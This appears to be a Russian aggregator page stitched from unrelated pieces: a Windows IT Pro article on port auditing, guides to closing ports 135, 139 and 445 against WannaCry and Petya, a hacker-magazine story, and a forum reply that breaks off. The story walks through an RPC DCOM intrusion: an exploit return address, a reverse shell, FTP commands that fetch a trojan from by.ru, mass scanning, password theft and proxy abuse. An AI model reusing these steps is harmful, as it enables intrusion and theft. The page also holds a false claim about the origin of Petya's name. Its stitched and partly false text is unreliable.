135 порт за что отвечает: Основы сетевых портов | Windows IT Pro/RE — specable.ru

Основы сетевых портов | Windows IT Pro/RE

Исследуем сетевые порты

Сетевые порты могут дать важнейшую информацию о приложениях, которые обращаются к компьютерам по сети. Зная приложения, которые используют сеть, и соответствующие сетевые порты, можно составить точные правила для брандмауэра, и настроить хост-компьютеры таким образом, чтобы они пропускали только полезный трафик. Построив профиль сети и разместив инструменты для распознавания сетевого трафика, можно более эффективно обнаруживать взломщиков — иногда просто анализируя генерируемый ими сетевой трафик. Эту тему мы начали рассматривать в первой части статьи, опубликованной в предыдущем номере журнала. Там приводились основные сведения о портах TCP/IP как фундаменте сетевой безопасности. Во второй части будут описаны некоторые методы для сетей и хост-компьютеров, с помощью которых можно определить приложения, прослушивающие сеть.

Далее в статье будет рассказано о том, как оценить трафик, проходящий через сеть.

Блокирование сетевых приложений

Поверхность атаки по сети — общепринятый термин для описания уязвимости сети. Многие сетевые нападения проходят через уязвимые приложения, и можно существенно уменьшить площадь атаки, сократив число активных приложений в сети. Другими словами, следует отключить неиспользуемые службы, установить брандмауэр на выделенной системе для проверки законности трафика и составить исчерпывающий список управления доступом (access control list — ACL) для брандмауэра на периметре сети.

Каждый открытый сетевой порт представляет приложение, прослушивающее сеть. Поверхность атаки каждого сервера, подключенного к сети, можно уменьшить, отключив все необязательные сетевые службы и приложения. Версия Windows Server 2003 превосходит предшествующие версии операционной системы, так как в ней по умолчанию активизируется меньше сетевых служб. Однако аудит все же необходим, чтобы обнаружить вновь установленные приложения и изменения в конфигурации, которые открывают лишние сетевые порты.

Каждый открытый порт — потенциальная лазейка для взломщиков, которые используют пробелы в хост-приложении или тайком обращаются к приложению с именем и паролем другого пользователя (либо применяют другой законный метод аутентификации). В любом случае, важный первый шаг для защиты сети — просто отключить неиспользуемые сетевые приложения.

Сканирование портов

Сканирование портов — процесс обнаружения прослушивающих приложений путем активного опроса сетевых портов компьютера или другого сетевого устройства. Умение читать результаты сканирования и сравнивать сетевые отчеты с результатами хост-опроса портов позволяет составить ясную картину трафика, проходящего через сеть. Знание сетевой топологии — важное условие подготовки стратегического плана сканирования конкретных областей. Например, сканируя диапазон внешних IP-адресов, можно собрать ценные данные о взломщике, проникшем из Internet. Поэтому следует чаще сканировать сеть и закрыть все необязательные сетевые порты.

Внешнее сканирование портов брандмауэра позволяет обнаружить все откликающиеся службы (например, Web или электронная почта), размещенные на внутренних серверах. Эти серверы также следует защитить. Настройте привычный сканер портов (например, Network Mapper — Nmap) на проверку нужной группы портов UDP или TCP. Как правило, сканирование портов TCP — процедура более надежная, чем сканирование UDP, благодаря более глубокой обратной связи с ориентированными на соединения протоколами TCP. Существуют версии Nmap как для Windows, так и для Unix. Запустить базовую процедуру сканирования просто, хотя в программе реализованы и гораздо более сложные функции. Для поиска открытых портов на тестовом компьютере я запустил команду

nmap 192.168.0.161

На экране 1 показаны результаты сеанса сканирования — в данном случае компьютера Windows 2003 в стандартной конфигурации. Данные, собранные в результате сканирования портов, показывают наличие шести открытых портов TCP.

Экран 1. Базовый сеанс сканирования Nmap

Порт 135 используется функцией отображения конечных точек RPC, реализованной во многих технологиях Windows — например, приложениях COM/DCOM, DFS, журналах событий, механизмах репликации файлов, формирования очередей сообщений и Microsoft Outlook. Данный порт должен быть блокирован в брандмауэре на периметре сети, но трудно закрыть его и одновременно сохранить функциональность Windows.

Порт 139 используется сеансовой службой NetBIOS, которая активизирует браузер поиска других компьютеров, службы совместного использования файлов, Net Logon и службу сервера. Его трудно закрыть, как и порт 135.
Порт 445 используется Windows для совместной работы с файлами. Чтобы закрыть этот порт, следует блокировать File and Printer Sharing for Microsoft Networks. Закрытие этого порта не мешает соединению компьютера с другими удаленными ресурсами; однако другие компьютеры не смогут подключиться к данной системе.
Порты 1025 и 1026 открываются динамически и используются другими системными процессами Windows, в частности различными службами.
Порт 3389 используется Remote Desktop, которая не активизирована по умолчанию, но на моем тестовом компьютере активна. Чтобы закрыть порт, следует перейти к вкладке Remote в диалоговом окне System Properties и сбросить флажок Allow users to connect remotely to this computer.

Обязательно следует выполнить поиск открытых портов UDP и закрыть лишние. Программа сканирования показывает открытые порты компьютера, которые видны из сети. Аналогичные результаты можно получить с помощью инструментов, расположенных на хост-системе.

Хост-сканирование

Помимо использования сетевого сканера портов, открытые порты на хост-системе можно обнаружить с помощью следующей команды (запускается на хост-системе):

netstat -an

Эта команда работает как в Windows, так и в UNIX. Netstat выдает список активных портов компьютера. В Windows 2003 Windows XP следует добавить параметр -o, чтобы получить соответствующий идентификатор процесса (program identifier — PID). На экране 2 показаны выходные результаты Netstat для того же компьютера, сканирование портов которого выполнялось ранее. Следует обратить внимание на то, что закрыто несколько портов, которые прежде были активны.

Экран 2. Список открытых портов, полученный с помощью Netstat

Аудит журнала брандмауэра

Еще один полезный способ обнаружения сетевых приложений, которые отправляют или получают данные по сети, — собирать и анализировать больше данных в журнале брандмауэра. Записи Deny, в которых приводится информация с внешнего интерфейса брандмауэра, вряд ли будут полезны из-за «шумового трафика» (например, от червей, сканеров, тестирования по ping), засоряющего Internet. Но если записывать в журнал разрешенные пакеты с внутреннего интерфейса, то можно увидеть весь входящий и исходящий сетевой трафик.

Чтобы увидеть «сырые» данные трафика в сети, можно установить сетевой анализатор, который подключается к сети и записывает все обнаруженные сетевые пакеты. Самый широко распространенный бесплатный сетевой анализатор — Tcpdump для UNIX (версия для Windows называется Windump), который легко устанавливается на компьютере. После установки программы следует настроить ее для работы в режиме приема всех сетевых пакетов, чтобы регистрировать весь трафик, а затем подключить к монитору порта на сетевом коммутаторе и отслеживать весь трафик, проходящий через сеть. О настройке монитора порта будет рассказано ниже. Tcpdump — чрезвычайно гибкая программа, с помощью которой можно просматривать сетевой трафик с использованием специализированных фильтров и показывать только информацию об IP-адресах и портах либо все пакеты. Трудно просмотреть сетевые дампы в больших сетях без помощи соответствующих фильтров, но следует соблюдать осторожность, чтобы не потерять важные данные.

Объединение компонентов

До сих пор мы рассматривали различные методы и инструменты, с помощью которых можно обнаружить приложения, использующие сеть. Пришло время объединить их и показать, как определить открытые сетевые порты. Поразительно, как «болтливы» компьютеры в сети! Во-первых, рекомендуется познакомиться с документом Microsoft «Service overview and network port requirements for the Windows Server system» (http://support.microsoft.com/default.aspx?scid=kb;en-us;832017), в котором перечислены протоколы (TCP и UDP) и номера портов, используемые приложениями и большинством основных служб Windows Server. В документе описаны эти службы и используемые ими ассоциированные сетевые порты. Рекомендуется загрузить и распечатать это полезное для администраторов сетей Windows справочное руководство.

Настройка сетевого анализатора

Ранее отмечалось, что один из способов определить порты, используемые приложениями, — отслеживать трафик между компьютерами с помощью сетевого анализатора. Чтобы увидеть весь трафик, необходимо подключить сетевой анализатор к концентратору или монитору портов в коммутаторе. Каждому порту концентратора виден весь трафик каждого компьютера, подключенного к этому концентратору, но концентраторы — устаревшая технология, и большинство компаний заменяют их коммутаторами, которые обеспечивают хорошую производительность, но неудобны для анализа: каждый порт коммутатора принимает только трафик, направляемый одному компьютеру, подключенному к данному порту. Чтобы анализировать всю сеть, нужно отслеживать трафик, направляемый в каждый порт коммутатора.

Для этого требуется настроить монитор порта (разные поставщики называют его span port или mirrored port) в коммутаторе. Установить монитор порта в коммутаторе Cisco Catalyst компании Cisco Systems не составляет труда. Нужно зарегистрироваться на коммутаторе и активизировать режим Enable, затем перейти в режим configure terminal и ввести номер интерфейса порта коммутатора, на который следует посылать весь контролируемый трафик. Наконец, необходимо указать все отслеживаемые порты. Например, следующие команды обеспечивают мониторинг трех портов Fast Ethernet и пересылку копии трафика в порт 24.

interface FastEthernet0/24
port monitor FastEthernet0/1
port monitor FastEthernet0/2
port monitor FastEthernet0/3
end

В данном примере сетевой анализатор, подключенный к порту 24, будет просматривать весь исходящий и входящий трафик компьютеров, подключенных к первым трем портам коммутатора. Для просмотра созданной конфигурации следует ввести команду

show run

Чтобы сохранить новую конфигурацию, нужно использовать команду

write memory

Первоначальный анализ

Рассмотрим пример анализа данных, проходящих через сеть. Если для сетевого анализа используется компьютер Linux, то можно получить исчерпывающее представление о типе и частоте пакетов в сети с помощью такой программы, как IPTraf в режиме Statistical. Детали трафика можно выяснить с использованием программы Tcpdump.

В таблице приведены статистические выходные данные, собранные с помощью IPTraf в небольшой сети с Active Directory (AD) в течение 15 минут. Для краткости, тестирование проводилось вечером, когда никто из пользователей не обращался в сеть. В примере не показаны все порты Windows, но продемонстрированы приемы оценки портов и их привязки к службам и приложениям.

TCP 22. Наиболее активно работающий сетевой порт. Известно, что он используется программой Secure Shell (SSH), которую я применяю для подключения компьютера Linux с утилитой IPTraf.

UDP 138. Второй по частоте использования — UDP-порт 138, задействованный службой NetBIOS Datagram Service. В упомянутом выше документе Microsoft указывается, что данный порт используется несколькими службами Windows, в том числе Computer Browser, DFS, License, Messenger, Net Logon и Server. В группу портов TCP и UDP 135-139 входит несколько специфических портов, используемых многими приложениями Windows. По всей вероятности, некоторые из этих портов придется держать открытыми, что, к сожалению, открывает доступ к другим приложениям Windows.

TCP 80. Третий порт в списке — TCP-порт 80, который используется для незашифрованного трафика HTTP (Web). Но в режиме Statistics программы IPTraf нельзя определить, указывает ли данный трафик на попытки клиента обратиться к Web-серверу внутри сети или внутренний компьютер просто обращается к Web-серверу в Internet (более подробно о таком сценарии будет рассказано в следующем разделе).

UDP 137 и UDP 53. Эти порты используются службами преобразования имен Windows — в данном случае, NetBIOS и DNS.

UDP 67 и UDP 68. UDP-порты 67 и 68 используются DHCP-сервером для назначения динамических IP-адресов.

UDP 123. Данный порт зарезервирован для протокола Network Time Protocol (NTP) или, в случае Windows, Simple Network Time Protocol (SNTP). Этот протокол синхронизирует время между компьютером и NTP-сервером, например контроллером домена (DC).

Остальные порты получили лишь по одному пакету. Чтобы исследовать их, можно собирать статистику в течение более длительного времени и выявить закономерности, либо параллельно запустить Tcpdump и собрать больше данных, в частности, IP-адреса источника и назначения. Даже из приведенного общего вида можно извлечь информацию об этих пакетах. Например, каждый пакет имеет размер 229 байт; можно предположить, что одно приложение перескакивает между разными портами, но, чтобы утверждать это, требуется дополнительная информация.

Tcpdump

Tcpdump — превосходный инструмент командной строки для анализа сетей, который собирает детальные данные о пакетах в сети. Для того чтобы выяснить, где зарождается HTTP-трафик, можно воспользоваться командой

tcpdump -i eth2 -nq proto TCP
port 80

В данном простом примере требуется лишь узнать IP-адреса компьютеров, использующих HTTP, поэтому были задействованы параметры, которые показывают только данные TCP-порта 80. Параметр -i eth2 указывает анализируемый интерфейс. В нашей тестовой сети eth2 — это сетевой адаптер, подключенный к монитору порта в коммутаторе.

Параметр -nq представляет собой два отдельных параметра: -n предписывает Tcpdump не преобразовывать хост-имен и имен служб, а -q переводит Tcpdump в быстрый (скрытый) режим. Наконец, нужно просматривать только данные трафика TCP-порта 80, поэтому добавлена команда

proto TCP port 80

которая ограничивает объем рассматриваемых данных.

На экране 3 показаны выходные данные команды. Через порт 80 работают только два компьютера в сети 192.168.0.0. Отсюда можно сделать вывод, что компьютер по адресу 192. 168.0.112 пытается обратиться к Web-серверу по адресу 192.168.0.7. Теперь можно проверить, находится ли по этому адресу законный Web-сервер, или классифицировать находку иным образом. Список всех параметров приведен на главной странице Tcpdump. Возможности этой программы широки.

Используя справочную таблицу сетевых портов в сочетании с результатами нескольких сеансов сканирования портов, можно составить карту сигнатур полезного трафика в сети. Затем можно будет отмечать отклонения от нормы.

Подготовка набора правил брандмауэра

Чтобы составить набор правил брандмауэра — особенно в сложных ситуациях, например в демилитаризованной зоне (DMZ), — следует применять все перечисленные выше методы оценки сетевого трафика. С их помощью можно точно установить задействованные сетевые порты. На основе этих данных строится набор правил брандмауэра. В DMZ изолируются компьютеры, которые принимают прямые соединения с Internet (например, внешние почтовые серверы, Web-серверы) от других серверов во внутренней сети. Компьютеры в DMZ также должны устанавливать соединения с некоторыми компьютерами во внутренней сети, поэтому необходимо создать набор правил брандмауэра, который разрешает такое соединение.

Рассмотрим два метода, с помощью которых можно определить списки ACL для правил брандмауэра в тестовой DMZ. Предположим, что Web-серверу в DMZ требуется извлечь данные из системы Microsoft SQL Server во внутренней сети. Вместо туманного правила, которое разрешает соединение между IP-адресом Web-сервера и IP-адресом системы SQL Server, следует составить списки ACL, которые разрешают только обращения к SQL Server.

Один из способов подготовки такого ACL — контролировать монитор порта и составить ACL на основе анализа обнаруженного трафика. Для этого нужно установить монитор порта на DMZ-интерфейсе брандмауэра и активизировать анализатор сети. На данном этапе следует убедиться, что между DMZ и внутренней подсетью правила брандмауэра не действуют. Затем требуется сгенерировать типичный сетевой трафик с помощью Web-приложения, как это делали бы пользователи. После просмотра данных сетевого анализатора нужно записать все уникальные IP-адреса и соединения сетевого порта. Наконец, на основе собранной информации следует составить и разместить списки ACL брандмауэра. В данном примере требуется, чтобы Web-сервер инициировал соединения с SQL Server. SQL Server использует TCP-порт 1433, поэтому в результатах сетевого анализатора должны быть пакеты, направляемые в этот порт. Однако, если Web-сервер является членом домена, DC которого находятся во внутренней сети, можно ожидать интенсивного сетевого трафика от Web-сервера к DC. После анализа результатов анализатора следует разрешить в ACL брандмауэра весь необходимый сетевой трафик.

Второй метод обнаружения портов, необходимых Web-серверу для связи с машиной SQL Server, — метод проб и ошибок, который заключается в создании и развертывании ACL, запрещающего трафик между DMZ и внутренней сетью.

Начав использовать Web-сервер, следует отыскать в журналах брандмауэра блокированные пакеты (вероятно, их будет много). Для каждого блокированного пакета необходимо исследовать и оценить адреса источника и назначения, а также информацию о сетевом порте. Затем составляются списки ACL, которые разрешают полезный трафик. Эту процедуру следует повторять до тех пор, пока из журнала не исчезнут записи Deny для пакетов, пересылаемых между DMZ и внутренней сетью.

Знание — лучшая защита

Итак, в этой и предыдущей статьях было рассказано о месте сетевых портов в общей сетевой модели, а также о средствах обнаружения и мониторинга сетевых приложений. Вооружившись этой информацией, любой ИТ-специалист сможет приступить к изучению сети, чтобы лучше понять и защитить свой участок Internet.

Джеф Феллинг — Директор по информационной безопасности компании Quantive. Автор книги IT Administrator?s Top 10 Introductory Scripts for Windows (издательство Charles River Media). [email protected]

Поделитесь материалом с коллегами и друзьями

За что отвечает 135 порт в windows.

Как закрыть порты Windows. Используем командную строку

Вчера неизвестные устроили очередную массовую атаку с помощью вируса-шифровальщика. Эксперты заявили, что пострадали десятки крупных компаний на Украине и в России. Вирус-шифровальщик носит название Petya.A (вероятно, вирус назван в честь Петра Порошенко). Пишут, что если создать файл perfc (без расширения) и разместить его по адресу C:\Windows\, вирус обойдет вас стороной. Если ваш компьютер ушел в перезагрузку и начал «проверку диска», нужно его немедленно выключить. Загрузка с с LiveCD или USB-диска даст доступ к файлам. Еще один способ защиты: закрыть порты 1024–1035, 135 и 445. Как это сделать мы сейчас разберемся на примере Windows 10.

Шаг 1
Переходим в Брандмауэр Windows (лучше выбрать режим повышенной безопасности), выбираем вкладку «Дополнительные параметры ».
Выбираем вкладку «Правила для входящих подключений », потом действие «Создать правило » (в правой колонке).

Шаг 2
Выбираем тип правила — «для Порта ». В следующем окне выбираем пункт «Протокол TCP », указываем порты, которые хотите закрыть. В нашем случае это «135, 445, 1024-1035 » (без кавычек).

Шаг 3
Выбираем пункт «Блокировать подключение », в следующем окне отмечаем все профили: Доменный, Частный, Публичный.

Шаг 4
Осталось придумать название для правила (чтобы в будущем его было легко найти). Можно указать описание правила.

Если какие-то программы перестанут работать или станут работать неправильно, возможно, вы перекрыли порт, которые они используют. Нужно будет добавить для них исключение в брандмауэре.

135 TCP-порт используется службами удалённого обслуживания (DHCP, DNS, WINS и т.д.) и в приложениях «клиент-сервер» Microsoft (например, Exchange).

445 TCP-порт используется в Microsoft Windows 2000 и поздних версий для прямого TCP/IP-доступа без использования NetBIOS (например, в Active Directory).

Публикация

Вирус WannaCry, он же WannaCrypt или Wanna Decryptor, поразил виртуальный мир в мае 2017 года. Вредоносная программа проникала в локальные сети, заражая один компьютер за другим, шифровала файлы на дисках и требовала от пользователя перевести вымогателям от $300 до $600 за их разблокировку. Аналогичным образом действовал вирус Petya, получивший едва ли не политическую известность летом 2017 года.

Оба сетевых вредителя проникали в операционную систему компьютера-жертвы через одну и ту же дверь — сетевые порты 445 или 139. Вслед за двумя крупными вирусами и более мелкие виды компьютерной заразы начали эксплуатировать Что же это за порты, которые сканируют все, кому не лень?

За что отвечают порты 445 и 139 в ОС Windows

Данные порты используются в системе Windows для совместной работы с файлами и принтерами. Первый порт отвечает за работу протокола Server Message Blocks (SMB), а через второй работает протокол Network Basic Input-Output System (NetBIOS). Оба протокола позволяют компьютерам под управлением Windows подключаться по сети к «расшаренным» папкам и принтерам поверх основных протоколов TCP и UDP.

Начиная с Windows 2000, совместная работа с файлами и принтерами по сети осуществляется в основном через порт 445 по прикладному протоколу SMB. Протокол NetBIOS использовался в более ранних версиях системы, работая через порты 137, 138 и 139, и данная возможность сохранилась в более поздних версиях системы в качестве атавизма.

Чем опасны открытые порты

445 и 139 представляет собой незаметную, но значимую уязвимость в Windows. Оставляя данные порты незащищенными, вы широко распахиваете дверь на свой жесткий диск для непрошеных гостей вроде вирусов, троянов, червей, а также для хакерских атак. А если ваш компьютер включен в локальную сеть, то риску заражения вредоносным программным обеспечением подвергаются все ее пользователи.

Фактически, вы открываете совместный доступ к своему жесткому диску любому, кто сумеет получить доступ к данным портам. При желании и умении злоумышленники могут просмотреть содержимое жесткого диска, а то и удалить данные, форматировать сам диск или зашифровать файлы. Именно это и делали вирусы WannaCry и Petya, эпидемия которых прокатилась по миру этим летом.

Таким образом, если вы заботитесь о безопасности своих данных, будет не лишним узнать, как закрыть порты 139 и 445 в Windows.

Выясняем, открыты ли порты

В большинстве случаев порт 445 в Windows открыт, так как возможности совместного доступа к принтерам и файлам автоматически включаются еще при установке Windows. Это можно легко проверить на своей машине. Нажмите сочетание клавиш Win + R , чтобы открыть окно быстрого запуска. В нем введите “ cmd” для запуска командной строки. В командной строке наберите “netstat — na ” и нажмите Enter . Данная команда позволяет просканировать все активные сетевые порты и вывести данные об их статусе и текущих входящих подключениях.

Через несколько секунд появится таблица статистики по портам. В самом верху таблицы будет указан IP-адрес порта 445. Если в последнем столбце таблицы будет стоять статус “LISTENING” , то это означает, что порт открыт. Аналогичным образом можно найти в таблице порт 139 и выяснить его статус.

Как закрыть порты в Windows 10/8/7

Существует три основных метода, позволяющих закрыть порт 445 в Windows 10, 7 или 8. Они не сильно отличаются друг от друга в зависимости от версии системы и достаточно просты. Можно попробовать любой из них на выбор. Этими же способами можно закрыть и порт 139.

Закрываем порты через брандмауэр

Первый метод, позволяющий закрыть 445 порт в Windows, является наиболее простым и доступен практически любому пользователю.

Перейдите в Пуск > Панель управления > Брандмауэр Windows и нажмите на ссылку Дополнительные параметры .
Нажмите Правила для входящих исключений > Новое правило . В отобразившемся окне выберите Для порта > Далее > Протокол TCP > Определенные локальные порты , в поле рядом введите 445 и нажмите Далее.
Далее выберите Блокировать подключение и опять нажмите Далее . Установите три галочки, снова Далее . Укажите название и, при желании, описание нового правила и нажмите Готово .

Теперь возможность входящего соединения на порт 445 будет закрыта. Если необходимо, аналогичное правило можно создать и для порта 139.

Закрываем порты через командную строку

Второй метод включает в себя операции с командной строкой и больше подходит для продвинутых пользователей Windows.

Нажмите Пуск и в строке поиска в нижней части меню наберите “cmd” . В отобразившемся списке кликните правой кнопкой мыши на cmd и выберите Запуск от имени администратора .
В окно командной строки скопируйте команду netsh advfirewall set allprofile state on. Нажмите Enter.
Затем скопируйте следующую команду: netsh advfirewall firewall add rule dir=in action=block protocol=TCP localport=445 name=»Block_TCP-445″. Нажмите Enter еще раз.

В результате выполнения процедуры так же будет создано правило брандмауэра Windows для закрытия порта 445. Некоторые пользователи, впрочем, сообщают, что данный метод не работает на их машинах: при проверке порт остается в статусе “LISTENING”. В этом случае следует попробовать третий способ, который также достаточно прост.

Закрываем порты через реестр Windows

Блокировать соединения на порт 445 можно также путем внесения изменений в системный реестр. Использовать данный метод следует с осторожностью: реестр Windows является основной базой данных всей системы, и случайно допущенная ошибка может привести к непредсказуемым последствиям. Перед работой с реестром рекомендуется сделать резервную копию, например, с помощью программы CCleaner.

Нажмите Пуск и в строке поиска введите “regedit” . Нажмите Enter .
В дереве реестра перейдите в следующий каталог: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\NetBT\Parameters.
В правой части окна отобразится список параметров. Нажмите правой кнопкой мыши в свободной области списка и выберите Создать . В раскрывающемся меню выберите Параметр DWORD (32-bit) или Параметр DWORD (64-bit) в зависимости от типа вашей системы (32-битная или 64-битная).
Переименуйте новый параметр в SMBDeviceEnabled , а затем дважды кликните по нему. В отобразившемся окне Изменение параметра в поле Значение замените 1 на 0 и нажмите OK для подтверждения.

Этот способ является наиболее эффективным, если точно следовать приведенной выше инструкции. Следует отметить, что он относится только к порту 445.

Для того чтобы защита была эффективнее, после внесения изменений в реестр можно также отключить службу Windows Server. Для этого выполните следующее:

Нажмите Пуск и в строке поиска введите «services.msc». Откроется список системных служб Windows.
Найдите службу Server и дважды кликлите по ней. Как правило, она располагается где-то в середине списка.
В отобразившемся окне в раскрывающемся списке Тип запуска выберите Отключена и нажмите ОК .

Приведенные выше методы (за исключением третьего) позволяют закрыть не только порт 445, но и порты 135, 137, 138, 139. Для этого при выполнении процедуры просто заменяйте номер порта на нужный.

Если вам впоследствии понадобится открыть порты, просто удалите созданное правило в брандмауэре Windows или измените значение созданного в реестре параметра с 0 на 1, а потом включите обратно службу Windows Server, выбрав в списке Тип запуска значение Автоматически вместо Отключена .

Важно! Необходимо помнить, что порт 445 в Windows отвечает за совместный доступ к файлам, папкам и принтерам. Таким образом, если вы закроете данный порт, вы больше не сможете «расшарить» общую папку для других пользователей или распечатать документ по сети.

Если ваш компьютер включен в локальную сеть и данные функции необходимы вам для работы, следует воспользоваться сторонними средствами защиты. К примеру, активируйте сетевой экран вашего антивируса, который возьмет под контроль все порты и будет осуществлять их мониторинг на предмет несанкционированного доступа.

Выполняя приведенные выше рекомендации, можно обезопасить себя от незаметной, но серьезной уязвимости в Windows и защитить свои данные от многочисленных видов зловредного программного обеспечения, которое способно проникнуть в систему через порты 139 и 445.

Уязвимость была устрашающей, правда
готовый эксплоит оказался недоступен для
основной массы людей… Наверное поэтому
никто не чувствовал страха…

Группа польских экспертов в области
безопасности компьютерных технологий «Last
Stage of Delirium» сообщила публике о найденной
ими уязвимости, обработки DCOM объектов в
контексте RPC протокола. Это было чем-то
потрясающим, поскольку данный протокол
использовался практически всеми
существующими на этот момент версиями Windows.
Уязвимыми оказались ОС Windows NT, Windows XP, Windows 2000
и даже Windows Server 2003 был под прицелом. Этого
было более чем достаточно, чтобы завладеть
компьютерами большинства пользователей
сети Internet. Более того, многие серверы не
блокировали входящие пакеты на 135 порт,
именно он использовался для атаки. Что
делало их потенциальными жертвами.

Но спустя несколько часов Todd Sabin сообщает,
что уязвимыми являются все сервисы RPC. Это
значит, что настройка брандмауэра на
блокировку 135 порта является не достаточным
средством защиты. Опасности подвергаются
компьютеры с открытыми 135 (UDP/TCP), 139, 445 и 593
портами. СМИ освещают данную ошибку, как
потенциальную угрозу для безопасности
пользователей Windows. Дело шло к глобальной
катастрофе. Но поскольку публичного
эксплоита выпущено не было, все продолжали
жить своей прежней жизнью не задумываясь о
последствиях его появления в массах.

Но не все так пассивно отреагировали на
появление данной уязвимости. Хакеры
понемногу начинали писать приватные
эксплоиты, а script kids продолжали ждать его
появления. Результат не заставил себя долго
ждать. В течении нескольких дней появляются
некоторые наработки в этой области,
появляются первые эксплоиты. Тем не менее
большинство из них просто провоцирует сбой
на удаленной системе. Что можно объяснить,
поскольку технических деталей по поводу
найденной уязвимости известно не было. Хотя
некоторые версии ОС уже успешно
эксплуатировались.

Этот день стал переломным в истории
эксплуатации данной уязвимости. Наконец
появляется техническое описание проблемы.
После чего рождается большое количество
эксплоитов, под разные версии Windows.
Некоторые из них имеют даже графический
интерфейс, а иногда и функцию сканирования
определенного диапазона IP адресов.

Именно в этот момент началась массивная
атака хакеров на рядовых пользователей.
Более того, появился интернет червь MS Blast,
который с легкостью проникал на компьютеры
подключенные к Интернету и даже в
корпоративные сети крупнейших компаний
мира. В опасности оказались все…

Напасть на удаленную машину не составляет
особого труда. Поэтому script kids взялись за
свое дело. Кража кредитных кард и приватных
эксплоитов возросла в несколько раз. И
многие лакомые сегменты сети стали
пробоваться на вкус. Именно этим занялся
один хакер. Он давно хотел захватить сервер,
но приличной уязвимости под него до этого
не было. А не воспользоваться таким
подарком судьбы он просто не мог.

Пьеса в три акта

Первое, что пришлось ему сделать перед
атакой, это проверить какая именно
операционная система установлена на
сервере. Для этого он воспользовался
утилитой nmap. Хакер не раз уже писал о ее
возможностях, но я повторюсь и скажу, что
она используется для определения версии ОС
на удаленном компьютере. Благо она
существует как для Windows, так и для *nix. А
поскольку хакер для своей работы
использовал Windows, то его выбор пал на
графический вариант nmap.

Несколько минут работы сканера и
результат позитивный. 135 порт оказался
открытым и не защищенным брандмауэром. Это
было началом конца, началом долгожданной
атаки. На этот момент уже было написано
много эксплоитов, в том числе и «RCP Exploit GUI #2».
Его отличительной чертой было то, что он
имел графический интерфейс и содержал в
себе встроенные функции сканирования
диапазона IP, а также FTP сервер.

Запустив эксплоит, он указал адрес
целевого компьютера. Но в списке ОС для
атакуемых машин Windows NT указан не был. А ведь
именно она была установлена на сервере. Это
серьезная проблема, поскольку чтобы
запустить эксплоит необходимо знать его
точный адрес в памяти, чтобы потом передать
на него управление. Немного покопавшись в
файлах, скачанных вместе с эксплоитом он
нашел небольшой список адресов под широкую
разновидность линейки Windows. Среди них
присутствовал и Windows NT с предустановленным
Service Pack 4. Именно его значение он указал в
качестве адреса возврата, плюнув на ручной
выбор ОС. Число 0xE527F377 стало его тайным
пропуском в жизнь сервера. И он начал атаку.

Система сдалась без каких-либо
происшествий, так у хакера появился reverse-shell
с удаленным сервером. Теперь, когда он мог
исполнять на нем все что угодно, пришло
время установить Троян. Среди большого
числа возможных, был выбран DonaldDick. Для
осуществления своего плана ему пришлось
получить хостинг на бесплатном сервере с
поддержкой FTP. Вполне подошел BY.RU, именно
туда он и закачал сервер для трояна. Теперь,
когда DonaldDick стал доступным по FTP, он обратно
взялся за жертву, а точнее начал закачивать
на нее сервер трояна. Это был хорошо
продуманный план, поскольку уязвимость
могли пропатчить, а троян он и в Африке
троян. Набрав в консоли ftp он принялся
закачивать файл. Весь процесс занял у него,
написания всего лишь пяти строк:

open by.ru
имя_сервера.by.ru
пароль
get fooware.exe
bye

Где fooware.exe это переименованный сервер для
DonaldDick. Когда файл закачался, ему осталось
только запустить его. Для этого он просто
написал имя файла (fooware.exe) и с наслаждением
нажал Enter… После чего хакер получил удобный
контроль над сервером.

Но знаете как оно всегда бывает, когда
находишь что-то интересное продолжаешь с
этим играть. Так и наш Хакер захотел
получить более чем одну систему. Посмотрев,
что эксплоит позволяет провести массивное
сканирование, он взялся за работу, а точнее
за работу взялся KaHt. Его использование
оказалось не трудным. Так например, чтобы
про сканировать сеть с IP 192.168.0.* (класс С), ему
нужно было набрать «KaHt.exe 129.168.0.1
192.168.0.254″. Что собственно он и сделал,
после чего периодически проверял
результаты. Таким образом он получил доступ
к еще большему количеству пользователей, от
которых потом сумел получить пароли на
разные сервисы, почты, и много другой
полезной информации. Не говоря уже про то,
что он стал пользоваться многими из них как
анонимными прокси.

Пища к размышлению

Хотя Microsoft давно выпустила заплатку,
пользователи и админы не спешат
устанавливать патчи, надеясь что их сеть не
будет никому интересной. Но таких хакеров
большое количество и установка патча это
скорее необходимость, нежели возможность.
Еще можно блокировать все входящие пакеты
на 135, 139, 445 и 593 порты.

Естественно, что все это хакер делал через
анонимную прокси, а в результате почистил
за собой следы присутствия в системе. Но вам
следует задуматься, прежде чем повторять
его подвиги. Ведь такие действия считаются
противозаконными и могут закончиться для
вас достаточно плачевно…

Кровный , то, что у вас фаервол показывает, что svchost.exe слушает данный порт, ещё не означает, что он открыт для подключения извне.

Правила у вас вроде бы прописаны и должны работать.

Вы сканерами портов пробовали проверять? — ЦОБ (Центр Обеспечения Безопасности) (п.2.7)

И не забудьте о том, что ещё надо будет проверить IPv6, т.к. он у вас в системе включен, а вот сканеры обычно проверяют только IPv4 (я про централизованные сервисы).

Если данный протокол вам вообще не нужен, тогда его можно отключить:

Чтобы отключить компоненты IP версии 6 в Windows Vista, выполните указанные ниже действия.
1. Нажмите кнопку Пуск, введите regedit в поле Начать поиск, затем выберите regedit.exe в списке Программы.
2. В диалоговом окне Контроль учетных записей пользователей нажмите кнопку Продолжить.
3. Найдите и выберите следующий подраздел реестра:
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip6\Parameters\
4. Дважды щелкните пункт DisabledComponents для изменения параметра DisabledComponents.
Примечание. Если параметр DisabledComponents недоступен, его необходимо создать. Для этого выполните указанные ниже действия.
1. В меню Правка выберите пункт Создать, а затем — Параметр DWORD (32 бита).
2. Введите DisabledComponents и нажмите клавишу ВВОД.
3. Дважды щелкните пункт DisabledComponents.
5. Введите любое из указанных ниже значений для настройки протокола IP версии 6, а затем нажмите кнопку ОК.
1. Введите 0, чтобы включить все компоненты IP версии 6.
Примечание. Значение «0» используется по умолчанию.
2. Введите 0xffffffff, чтобы отключить все компоненты IP версии 6, кроме интерфейса замыкания на себя. При этом значении Windows Vista также будет использовать в политиках префиксов протокол IP версии 4 вместо IPv6.
3. Введите 0x20, чтобы использовать в политиках префикса IP версии 4 вместо IP версии 6.
4. Введите 0x10, чтобы отключить собственные интерфейсы IP версии 6.
5. Введите 0x01, чтобы отключить все туннельные интерфейсы IP версии 6.
6. Введите 0x11, чтобы отключить все интерфейсы IP версии 6, кроме интерфейса замыкания на себя.
Примечания
